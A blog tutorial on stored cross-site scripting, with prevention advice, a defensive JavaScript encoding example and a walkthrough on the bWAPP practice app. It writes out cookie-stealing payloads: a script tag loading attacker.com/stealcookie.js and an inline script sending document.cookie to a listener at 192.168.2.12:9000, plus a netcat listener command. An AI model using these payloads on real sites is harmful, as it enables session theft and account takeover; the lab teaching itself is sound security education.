by Anshuman    May 29, 2019

Introduction to Stored XSS

Stored (persistent) XSS occurs when an attacker finds an input, such as a comment box, whose contents the web application saves and later writes back into a page without proper output encoding. An HTML tag or script embedded in that input becomes a permanent part of the page, and every browser that loads the page parses and executes it, on every load, for every visitor.

For example, suppose an attacker finds that the comment section of a blog does not encode what it stores, and posts this comment:

Attacker’s Comment — Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more

<script src="http://attacker.com/stealcookie.js"></script>

The script "stealcookie.js" is written to read the browser's cookies (document.cookie) and send them to the attacker. Because the file is hosted on a site the attacker controls, he can change its contents at any time without touching the stored comment. Once the attacker holds a victim's session cookie, he can present it to the application and act as that user, which in practice means full control of the account.

The user, meanwhile, sees only a harmless-looking comment and has no idea what the page is doing in the background.

Real-world examples of Stored XSS

MySpace (the 2005 Samy worm) and TweetDeck (the 2014 self-retweeting tweet) are the best-known examples of stored XSS. In both cases the injected JavaScript was stored by the site and ran again for every user who viewed the affected page, and in both cases it spread itself further from each new victim, which is what made the damage so serious.

How to prevent Stored XSS attacks?

A Web Application Firewall (WAF) is often recommended as protection against XSS, and it is a useful extra layer, but it is not the primary fix. XSS is a bug in the application itself: untrusted input is written into a page without encoding. The real fix is to encode output for the context it lands in (HTML body, attribute, JavaScript, URL), to validate input where a strict format is known, to flag session cookies HttpOnly so document.cookie cannot read them, and to deploy a Content Security Policy that refuses to load scripts from hosts such as attacker.com. A WAF sits in front of all that and blocks known attack patterns, which stops opportunistic attacks and buys time to fix the code, but its filters can be bypassed.

A WAF is a filter for HTTP traffic. It inspects requests and responses against a set of rules (signature and anomaly-scoring rule sets such as the OWASP Core Rule Set used with ModSecurity; some commercial products add machine-learning models on top) and blocks traffic that looks like XSS, SQL injection, file inclusion and similar injection attacks. It cannot fix a security misconfiguration in the application itself; at best it hides some of the symptoms.

Every request a user sends to the web server first goes to the WAF, which inspects it and either blocks it or forwards it to the web server.

The same applies in the other direction: the server's response passes through the WAF, which can inspect and filter it before it is delivered to the user.
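As an added example (not code from the original post), here is a minimal blog-comment renderer in JavaScript that shows the defect a WAF is only papering over, and the fix that belongs in the application: the attacker's comment from the introduction written into the page by plain string concatenation, the same comment after contextual HTML encoding, and a session cookie set with the HttpOnly flag so that document.cookie cannot read it. The comment text, author name, cookie name and cookie value are constructed for the example.

```javascript
// Added example: vulnerable vs. hardened rendering of a stored blog comment.
// Comment text, author, cookie name and value are constructed for this example.

// Encode the five characters that matter in an HTML body or quoted attribute
// context (the OWASP output-encoding rule). '&' must be replaced first.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// The bug: the stored comment is concatenated straight into the page, so an
// embedded <script> tag is parsed and executed by every visitor's browser.
function renderCommentUnsafe(author, body) {
  return "<div class=\"comment\"><b>" + author + "</b>: " + body + "</div>";
}

// The fix: encode every untrusted value for the context it lands in. The
// attacker's <script> tag is now displayed as text, never executed.
function renderCommentSafe(author, body) {
  return "<div class=\"comment\"><b>" + escapeHtml(author) + "</b>: " + escapeHtml(body) + "</div>";
}

// Does the rendered HTML still contain an executable script element? A quick
// check for comparing the two renderers; production tests should use a parser.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Defence in depth against the attack in this post: a session cookie flagged
// HttpOnly is invisible to document.cookie, so an XSS that does run cannot
// exfiltrate it this way (it can still issue requests as the logged-in user).
function buildSessionCookie(name, value) {
  return name + "=" + encodeURIComponent(value) + "; Path=/; Secure; HttpOnly; SameSite=Lax";
}

// Constructed input: the attacker's comment from the introduction.
const ATTACKER_COMMENT =
  "Nice Blog! a similar type of blog I have also written, please visit my site to read more " +
  "<script src=\"http://attacker.com/stealcookie.js\"></script>";

const unsafeHtml = renderCommentUnsafe("guest", ATTACKER_COMMENT);
const safeHtml = renderCommentSafe("guest", ATTACKER_COMMENT);
console.log("unsafe render contains executable script:", containsScriptTag(unsafeHtml)); // true
console.log("safe render contains executable script:  ", containsScriptTag(safeHtml));   // false
console.log(safeHtml);
console.log("Set-Cookie: " + buildSessionCookie("PHPSESSID", "constructed-session-id"));
```

Run it with node and compare the two rendered strings: the unsafe one carries a live script element, the safe one shows the same bytes as inert text. Note that escapeHtml is only correct for HTML body and quoted-attribute contexts; a value placed inside a JavaScript block or a URL needs the encoder for that context instead.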

For more information:

1. Web application firewall

2. What is a Web Application Firewall (WAF)?

How to perform Stored XSS in a blogging web application?

Now choose Cross-site-Scripting — Stored (Blog) from the drop-down menu (the walkthrough below uses the bWAPP practice application) and click Hack.

As you can see from the screenshot, it is a demo blogging application with an input box where a user can post a comment.

To test it, enter the comment "Nice Blog" and hit Submit.

As the screenshot shows, the comment is posted and stored in the database, and it is displayed again to everyone who loads the page. That persistence is exactly what a stored XSS needs.

Now let's enter a JavaScript payload that steals the browser's cookie.

Payload comment to steal the cookie:

Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more

<script>new Image().src="http://192.168.2.12:9000/?cookie="+document.cookie;</script>

As the screenshot shows, the comment is posted to the blog together with the injected script. When any visitor loads the page, the script builds an image URL from the listener's address and the value of document.cookie (the cookies the browser holds for the vulnerable site), and the browser issues a GET request for that URL, so the cookie arrives at 192.168.2.12:9000 in the query parameter "cookie". The concatenation has to happen inside JavaScript: a src attribute is static HTML, so a payload of the form src="http://192.168.2.12:9000?cookie"+document.cookie requests a fixed URL and leaves +document.cookie behind as meaningless attribute text. Note also that cookies are scoped by host, not port, so if the listener runs on the same machine as the vulnerable application the browser sends the same cookies in the request's Cookie header as well.

The request is caught with a netcat listener on the attacker's machine (for example nc -lvp 9000). This is a plain listener, not a reverse shell: netcat simply waits for an incoming TCP connection on port 9000 and prints whatever the browser sends.

As the screenshot shows, immediately after the comment was posted the listener received a connection carrying the browser's cookie.

This is one way to steal a cookie; there are several others (sending it with fetch or XMLHttpRequest, for instance). The important point is that the stored code runs every time the page is loaded, by whoever loads it, so the attacker collects the cookie of every visitor to that page, not only the one who posted the comment.

For more information:

1. Testing for Stored Cross site scripting (OTG-INPVAL-002)

2. Stored XSS

I hope you guys liked this post. Bye bye for now.

Happy Hacking :)
